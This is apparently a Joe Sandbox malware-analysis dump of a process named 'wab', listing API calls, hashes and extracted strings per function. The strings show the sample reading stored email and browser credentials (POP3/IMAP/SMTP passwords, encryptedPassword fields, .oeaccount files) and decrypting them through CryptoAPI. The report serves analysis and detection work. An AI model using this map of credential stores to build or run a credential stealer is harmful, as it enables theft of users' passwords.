                  • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                  • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                  • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                  APIs
                  • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                    • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                    • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                    • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: PrivateProfile$StringWrite_itoamemset
                  • String ID:
                  • API String ID: 4165544737-0
                  • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                  • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                  • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                  • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                  APIs
                  • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: FreeLibrary
                  • String ID:
                  • API String ID: 3664257935-0
                  • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                  • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                  • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                  • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                  APIs
                  • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                  • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                  • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                  • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                  APIs
                  • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: FreeLibrary
                  • String ID:
                  • API String ID: 3664257935-0
                  • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                  • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                  • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                  • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                  APIs
                  • EnumResourceNamesA.KERNEL32(?,?,Function_00010C68,00000000), ref: 00410D02
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: EnumNamesResource
                  • String ID:
                  • API String ID: 3334572018-0
                  • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                  • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                  • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                  • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                  APIs
                  • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: CloseFind
                  • String ID:
                  • API String ID: 1863332320-0
                  • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                  • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                  • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                  • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                  APIs
                  • RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: Open
                  • String ID:
                  • API String ID: 71445658-0
                  • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                  • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                  • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                  • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                  APIs
                  • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                  • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                  • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                  • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                  APIs
                  • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A70,?,00404986,?,?,00000000,?,00000000,?), ref: 004047DA
                  • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                  • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                  • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                  • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                  • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                  • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                  • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                  • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                  • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                  • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                  • API String ID: 2238633743-192783356
                  • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                  • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                  • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                  • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: PrivateProfileString_mbscmpstrlen
                  • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                  • API String ID: 3963849919-1658304561
                  • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                  • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                  • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                  • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@??3@memcpymemset
                  • String ID: (yE$(yE$(yE
                  • API String ID: 1865533344-362086290
                  • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                  • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                  • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                  • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                  APIs
                  • memset.MSVCRT ref: 0040EBD8
                    • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                    • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                    • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                  • memset.MSVCRT ref: 0040EC2B
                  • memset.MSVCRT ref: 0040EC47
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                  • memset.MSVCRT ref: 0040ECDD
                  • memset.MSVCRT ref: 0040ECF2
                  • _mbscpy.MSVCRT ref: 0040ED59
                  • _mbscpy.MSVCRT ref: 0040ED6F
                  • _mbscpy.MSVCRT ref: 0040ED85
                  • _mbscpy.MSVCRT ref: 0040ED9B
                  • _mbscpy.MSVCRT ref: 0040EDB1
                  • _mbscpy.MSVCRT ref: 0040EDC7
                  • memset.MSVCRT ref: 0040EDE1
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                  • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                  • API String ID: 3137614212-1455797042
                  • Opcode ID: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                  • Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
                  • Opcode Fuzzy Hash: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                  • Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65
                  APIs
                    • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                    • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                    • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                    • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                    • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                    • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                  • memset.MSVCRT ref: 0040E5B8
                  • memset.MSVCRT ref: 0040E5CD
                  • _mbscpy.MSVCRT ref: 0040E634
                  • _mbscpy.MSVCRT ref: 0040E64A
                  • _mbscpy.MSVCRT ref: 0040E660
                  • _mbscpy.MSVCRT ref: 0040E676
                  • _mbscpy.MSVCRT ref: 0040E68C
                  • _mbscpy.MSVCRT ref: 0040E69F
                  • memset.MSVCRT ref: 0040E6B5
                  • memset.MSVCRT ref: 0040E6CC
                    • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                    • Part of subcall function 004066A3: memcmp.MSVCRT ref: 004066EE
                  • memset.MSVCRT ref: 0040E736
                  • memset.MSVCRT ref: 0040E74F
                  • sprintf.MSVCRT ref: 0040E76D
                  • sprintf.MSVCRT ref: 0040E788
                  • _strcmpi.MSVCRT ref: 0040E79E
                  • _strcmpi.MSVCRT ref: 0040E7B7
                  • _strcmpi.MSVCRT ref: 0040E7D3
                  • memset.MSVCRT ref: 0040E858
                  • sprintf.MSVCRT ref: 0040E873
                  • _strcmpi.MSVCRT ref: 0040E889
                  • _strcmpi.MSVCRT ref: 0040E8A5
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                  • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                  • API String ID: 4171719235-3943159138
                  • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                  • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                  • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                  • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                  APIs
                  • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                  • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                  • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                  • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                  • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                  • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                  • GetWindowRect.USER32(00000000,?), ref: 0041047C
                  • GetWindowRect.USER32(?,?), ref: 00410487
                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                  • GetDC.USER32 ref: 004104E2
                  • strlen.MSVCRT ref: 00410522
                  • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                  • ReleaseDC.USER32(?,?), ref: 00410580
                  • sprintf.MSVCRT ref: 00410640
                  • SetWindowTextA.USER32(?,?), ref: 00410654
                  • SetWindowTextA.USER32(?,00000000), ref: 00410672
                  • GetDlgItem.USER32(?,00000001), ref: 004106A8
                  • GetWindowRect.USER32(00000000,?), ref: 004106B8
                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                  • GetClientRect.USER32(?,?), ref: 004106DD
                  • GetWindowRect.USER32(?,?), ref: 004106E7
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                  • GetClientRect.USER32(?,?), ref: 00410737
                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                  • String ID: %s:$EDIT$STATIC
                  • API String ID: 1703216249-3046471546
                  • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                  • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                  • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                  • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                  APIs
                  • memset.MSVCRT ref: 004024F5
                    • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                  • _mbscpy.MSVCRT ref: 00402533
                  • _mbscpy.MSVCRT ref: 004025FD
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: _mbscpy$QueryValuememset
                  • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                  • API String ID: 168965057-606283353
                  • Opcode ID: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                  • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                  • Opcode Fuzzy Hash: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                  • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                  APIs
                  • memset.MSVCRT ref: 00402869
                    • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                  • _mbscpy.MSVCRT ref: 004028A3
                    • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                  • _mbscpy.MSVCRT ref: 0040297B
                    • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                  • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                  • API String ID: 1497257669-167382505
                  • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                  • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                  • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                  • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                  APIs
                  • EndDialog.USER32(?,?), ref: 0040FC88
                  • GetDlgItem.USER32(?,000003EA), ref: 0040FCA0
                  • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040FCBF
                  • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040FCCC
                  • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040FCD5
                  • memset.MSVCRT ref: 0040FCFD
                  • memset.MSVCRT ref: 0040FD1D
                  • memset.MSVCRT ref: 0040FD3B
                  • memset.MSVCRT ref: 0040FD54
                  • memset.MSVCRT ref: 0040FD72
                  • memset.MSVCRT ref: 0040FD8B
                  • GetCurrentProcess.KERNEL32 ref: 0040FD93
                  • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040FDB8
                  • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040FDEE
                  • memset.MSVCRT ref: 0040FE45
                  • GetCurrentProcessId.KERNEL32 ref: 0040FE53
                  • memcpy.MSVCRT ref: 0040FE82
                  • _mbscpy.MSVCRT ref: 0040FEA4
                  • sprintf.MSVCRT ref: 0040FF0F
                  • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040FF28
                  • GetDlgItem.USER32(?,000003EA), ref: 0040FF32
                  • SetFocus.USER32(00000000), ref: 0040FF39
                  Strings
                  • {Unknown}, xrefs: 0040FD02
                  • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040FF09
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                  • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                  • API String ID: 1428123949-3474136107
                  • Opcode ID: d86657001ae41ff369873dc728ed0a742e0e79a3b96cce1ecbd5be397a74016d
                  • Instruction ID: dbacf55a19a30e1480a431b78f30a2e126a23dc86512cc8492e46cc2065c5524
                  • Opcode Fuzzy Hash: d86657001ae41ff369873dc728ed0a742e0e79a3b96cce1ecbd5be397a74016d
                  • Instruction Fuzzy Hash: 6371A972808345BFE7319B51EC41EDB7B9CFB84345F04043AF644921A2DA79DE49CB6A
                  APIs
                  • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                  • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                  • GetDlgItem.USER32(?,000003EE), ref: 00401103
                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                  • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                  • LoadCursorA.USER32(00000067), ref: 0040115F
                  • SetCursor.USER32(00000000,?,?), ref: 00401166
                  • GetDlgItem.USER32(?,000003EE), ref: 00401186
                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                  • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                  • SetBkMode.GDI32(?,00000001), ref: 004011B9
                  • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                  • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                  • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                  • EndDialog.USER32(?,00000001), ref: 0040121A
                  • DeleteObject.GDI32(?), ref: 00401226
                  • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                  • ShowWindow.USER32(00000000), ref: 00401253
                  • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                  • ShowWindow.USER32(00000000), ref: 00401262
                  • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                  • memset.MSVCRT ref: 0040128E
                  • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                  • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                  • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                  • String ID:
                  • API String ID: 2998058495-0
                  • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                  • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                  • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                  • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                  APIs
                    • Part of subcall function 00409070: LoadMenuA.USER32(00000000), ref: 00409078
                    • Part of subcall function 00409070: sprintf.MSVCRT ref: 0040909B
                  • SetMenu.USER32(?,00000000), ref: 0040BD23
                  • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BD56
                  • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BD6C
                  • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BDCC
                  • LoadIconA.USER32(00000066,00000000), ref: 0040BE3B
                  • _strcmpi.MSVCRT ref: 0040BE93
                  • RegDeleteKeyA.ADVAPI32(80000001,0044C52F), ref: 0040BEA8
                  • SetFocus.USER32(?,00000000), ref: 0040BECE
                  • GetFileAttributesA.KERNEL32(0045AB10), ref: 0040BEE7
                  • GetTempPathA.KERNEL32(00000104,0045AB10), ref: 0040BEF7
                  • strlen.MSVCRT ref: 0040BEFE
                  • strlen.MSVCRT ref: 0040BF0C
                  • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BF68
                    • Part of subcall function 00404B87: strlen.MSVCRT ref: 00404BA4
                    • Part of subcall function 00404B87: SendMessageA.USER32(?,0000101B,?,?), ref: 00404BC8
                  • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BFB3
                  • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BFC6
                  • memset.MSVCRT ref: 0040BFDB
                  • SetWindowTextA.USER32(?,?), ref: 0040BFFF
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                  • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                  • API String ID: 2303586283-933021314
                  • Opcode ID: c18e167360c9832f76d4060667def10e2fdfd132df2f90ae90de526b0002aaa1
                  • Instruction ID: 018683a0c001df71ea8fb117e25ab04faf3265e4b472b332b07084323bdedb2f
